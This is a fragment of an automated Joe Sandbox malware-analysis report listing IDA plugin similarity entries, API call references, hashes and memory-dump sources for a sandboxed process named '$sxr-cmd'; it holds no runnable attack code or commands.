Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
• String ID:
• API String ID: 3966000956-0
• Opcode ID: 9ae3b259ec636c1bd328a689641e6129c1d65987d993fbdd2999725aaa90297c
• Instruction ID: dc881366e4d4f216422a7e48e33c87f1473e15f48eaf1937a56f578e77737717
• Opcode Fuzzy Hash: 9ae3b259ec636c1bd328a689641e6129c1d65987d993fbdd2999725aaa90297c
• Instruction Fuzzy Hash: 9D51A332A09F8285EBA1AF21D8902B9A7A4FB4DB64F844135DA0D27794DF3CE55DC320
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
• Instruction ID: 59ea74df5cc15291200e906e16e53076ca92644d0ee45e0b4f006ce752728548
• Opcode Fuzzy Hash: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
• Instruction Fuzzy Hash: 52612C32119F58DAEB649B15E458B5A77A1F3D9B49F900155FA8F83BA8CB7CC448CF00
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: memset$_setjmp
• String ID:
• API String ID: 3883041866-0
• Opcode ID: 24b193531554a553586c69ba7b5e2834a1963165cbc680f5adf951f0dc341e04
• Instruction ID: abad54eaec2b97dcd7469ce1afb6c3d4ce7beec4b89920e3a69d43c1797c7dd1
• Opcode Fuzzy Hash: 24b193531554a553586c69ba7b5e2834a1963165cbc680f5adf951f0dc341e04
• Instruction Fuzzy Hash: 58514232608B868EEBA1EF21D8803E9B7A4FB49754F804135DA4D5BA58DF3DD64DCB10
Uniqueness

Uniqueness Score: -1.00%

APIs
• _wcsicmp.MSVCRT ref: 00007FF7137EB4BD
  • Part of subcall function 00007FF7137F06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F06D6
  • Part of subcall function 00007FF7137F06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F06F0
  • Part of subcall function 00007FF7137F06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F074D
  • Part of subcall function 00007FF7137F06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F0762
• _wcsicmp.MSVCRT ref: 00007FF7137EB518
• _wcsicmp.MSVCRT ref: 00007FF7137EB58B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$_wcsicmp$AllocProcess
• String ID: ELSE$IF/?
• API String ID: 3223794493-1134991328
• Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
• Instruction ID: 57b61cac977ab494e7cf4edadfddb776f0a3859f519955125525af31e912dc3d
• Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
• Instruction Fuzzy Hash: E1416621A0DE0381FBE4BB25A4912BDAAA5AF48760FC44539D51E77395EE3DE41C8330
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: memset$File_get_osfhandle$PointerReadlongjmp
• String ID:
• API String ID: 1532185241-0
• Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
• Instruction ID: e6d16f0d2fc423c6ab2b3be0d05bff1daf9e23660ac28f5dd115e9e5fc9fbb76
• Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
• Instruction Fuzzy Hash: 5F41F632A04F518BE794AB21D44157EFAE1FB88B60F844535EA0A67781CF3DE959C720
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: ErrorFileLast$DeleteRead_get_osfhandle
• String ID:
• API String ID: 3588551418-0
• Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
• Instruction ID: 4cd08ad90fe35ef34c173f672d6334eaa7369ed0c837802fb8e16a6357c248c5
• Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
• Instruction Fuzzy Hash: 50419031A08A46CBE794AB11948027DE691EF88BB1F944138E60E67791DF7DE85C8770
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: ErrorModememset$FullNamePath_wcsicmp
• String ID:
• API String ID: 2123716050-0
• Opcode ID: ee032107b5e0b45f2cd1eb5c2fd3004c7ad094b49dd3a9eb4ad0f3ee6277fee3
• Instruction ID: 72fb605b4348cd2edf4069e9213a2d6f6094360c4ee18aa9f509d1b30faff3e8
• Opcode Fuzzy Hash: ee032107b5e0b45f2cd1eb5c2fd3004c7ad094b49dd3a9eb4ad0f3ee6277fee3
• Instruction Fuzzy Hash: 2C41A032705EC28AEBB1AF21D8803E9A794FB49798F444134DA5D4EA98DF3CE248C710
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
• String ID:
• API String ID: 3114114779-0
• Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
• Instruction ID: 56a710625c2a90c19be27f3e45a1872f1518bfd13c9552dd0368ba9cab3fdf57
• Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
• Instruction Fuzzy Hash: 6D410A36A05F42CEE780EF65D4802ACB7A5FB48768F954135DA0DA3B54DF38D41AC760
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF713809A82), ref: 00007FF71380A77A
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF713809A82), ref: 00007FF71380A7AF
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF713809A82), ref: 00007FF71380A80E
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF713809A82), ref: 00007FF71380A839
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF713809A82), ref: 00007FF71380A850
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: QueryValue$CloseErrorLastOpen
• String ID:
• API String ID: 2240656346-0
• Opcode ID: fab5d7ce924ce7ff34160a1e6dbe691a1ea5e09fa15a4ad8ec0eca9d581aded6
• Instruction ID: 7afcc8553fcbc4c1fa98d48f8ff8986b3ab4b7c78ccee1aa75144d88acc41263
• Opcode Fuzzy Hash: fab5d7ce924ce7ff34160a1e6dbe691a1ea5e09fa15a4ad8ec0eca9d581aded6
• Instruction Fuzzy Hash: D231A232618F4286F7909F14E480479F6E4FB8D7A0F944230EA8E66754DF3DD4698B20
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF7137F01B8: _get_osfhandle.MSVCRT ref: 00007FF7137F01C4
                                                                                                              • Part of subcall function 00007FF7137F01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7137FE904,?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F01D6
                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF71380D0F9
                                                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF71380D10F
                                                                                                            • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF71380D166
                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF71380D17A
                                                                                                            • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF71380D18C
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
• String ID:
• API String ID: 3008996577-0
• Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
• Instruction ID: 1dbefaea7e9d4fa0e53f338a8ca554db0d7e1a4482d0dcd2745341badd4194a5
• Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
• Instruction Fuzzy Hash: 75215A22B14A51CEF740AB71E8400BDBBB0FB8DB64B845125EE1D63B98DF38D059CB24
Uniqueness
• Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction ID: 293195b8bbf4479d610c4483b0a03604a2021c60c1f7caa8b5aec6deb79c3708
• Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction Fuzzy Hash: 6411A732A55E35E1FE681165D47DBE910C37BF537CFC406A4FA66073DE8B584889C224
Uniqueness
• Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3355953691.000002155A580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002155A580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a580000_$sxr-cmd.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction ID: 09311781c0dc539dba5ee21173bc5950b06e8c53d9b3039d5ae7eac255293120
• Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction Fuzzy Hash: 9D11C836A50E30E9FFD41156F45DBE910E7BBF43BCE9406A4BA670EFE68B144849CA00
Uniqueness
• Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: afeb0ab3ae9b140264ba62f65efacef86e232e555d1866a57a7faeca2321756a
• Instruction ID: 3c501c5a33c7aab8c2083f20e6b4acc8cc8432e261da8965f6a8f7d642ad437a
• Opcode Fuzzy Hash: afeb0ab3ae9b140264ba62f65efacef86e232e555d1866a57a7faeca2321756a
• Instruction Fuzzy Hash: F411BB31201E39F2FE105B25985CFE42293A7E67A9F980AA4F927573D5EF38C4098210
Uniqueness
• Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID:
• API String ID: 1092925422-0
• Opcode ID: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
• Instruction ID: cb8c35307c11de4a3327e203cbf00dd481b0423d58b9e79f27c6fc53f4eff856
• Opcode Fuzzy Hash: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
• Instruction Fuzzy Hash: E4114C36605F54E7EF248F11E448A89A7B1F795B98F844065EB4913B98EF39C548C740
Uniqueness
• Uniqueness Score: -1.00%
APIs
• WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF71380C9EE,?,?,?,00007FF71380EA6C,?,?,?,00007FF71380E925), ref: 00007FF7137F5CCB
• GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00007FF71380C9EE,?,?,?,00007FF71380EA6C,?,?,?,00007FF71380E925), ref: 00007FF7137F5CDF
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7137F5D03
• fprintf.MSVCRT ref: 00007FF7137FF4A9
• fflush.MSVCRT ref: 00007FF7137FF4C2
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
• String ID:
• API String ID: 1826527819-0
• Opcode ID: 9b0532f4637facb70c38994ad755a75d253ca2745f37b53511dc5f2b70e91ec1
• Instruction ID: e3e39b6dc3ea46fb18c2330d31135915297370fc2491832b21847ee7b79b62ec
• Opcode Fuzzy Hash: 9b0532f4637facb70c38994ad755a75d253ca2745f37b53511dc5f2b70e91ec1
• Instruction Fuzzy Hash: 5C015B21908E82CAE7847B24A4442B9FEA0FB8E761FC45130D95F16392DF7D905CC730
Uniqueness
• Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: CreateSemaphore
• String ID: _p0$wil
• API String ID: 1078844751-1814513734
• Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
• Instruction ID: d696eb3f0ded21e14c5eed12c0e4377fd59e900b14d3232d9b41feab2d408457
• Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
• Instruction Fuzzy Hash: 6451D561B1DE46C6EFA1AF5494542BAA2D0EF84BA0FD44435DE4D2FB84DE3ED4198330
Uniqueness
• Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3355953691.000002155A580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002155A580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a580000_$sxr-cmd.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm$f
• API String ID: 3242871069-629598281
• Opcode ID: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
• Instruction ID: 0337673d71b2a8948f8be49ccb245bd0bc16d2fe48ac4eb075a83ad74432d2f4
• Opcode Fuzzy Hash: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
• Instruction Fuzzy Hash: B951B436711A21EAEF54DB15D448F9D3BA7F3A4BDCFA081A0EA1647788DB35D849C700
Uniqueness
• Uniqueness Score: -1.00%
APIs
• RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF71380B934
• GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7137F5085), ref: 00007FF71380B9A5
• GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7137F5085), ref: 00007FF71380B9F7
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Global$AllocAsciizCreateFreeFromStringUnicode
• String ID: %WINDOWS_COPYRIGHT%
• API String ID: 1103618819-1745581171
• Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
• Instruction ID: 0122c8c6bd9141f6156d1d1f92db3c3495ec74b4b692b6cf7c51735e2ee553f1
• Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
• Instruction Fuzzy Hash: CA419462A08B8186EB91AF119410279F7E0FB49BA4FC54231DE8D27395EF3DE459C720
Uniqueness
• Uniqueness Score: -1.00%
APIs
Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$_wcslwr
                                                                                                            • String ID: [%s]
                                                                                                            • API String ID: 886762496-302437576
                                                                                                            • Opcode ID: 6b4c1c4d74b94ba716d9676fa8f70ee5e6fe565704e602bb4556ef7a03b977ca
                                                                                                            • Instruction ID: 974a6a56f2961e7984d52fe2950eff34a7eb49f80dcbe665052186d52ccceee6
                                                                                                            • Opcode Fuzzy Hash: 6b4c1c4d74b94ba716d9676fa8f70ee5e6fe565704e602bb4556ef7a03b977ca
                                                                                                            • Instruction Fuzzy Hash: EF319F32705B8289EBA1EF21D8903E9A7A0FB88B98F844135CE4D5B754DF3CD259C320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3355953691.000002155A580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002155A580000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a580000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                            • String ID: csm$f
                                                                                                            • API String ID: 3242871069-629598281
                                                                                                            • Opcode ID: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
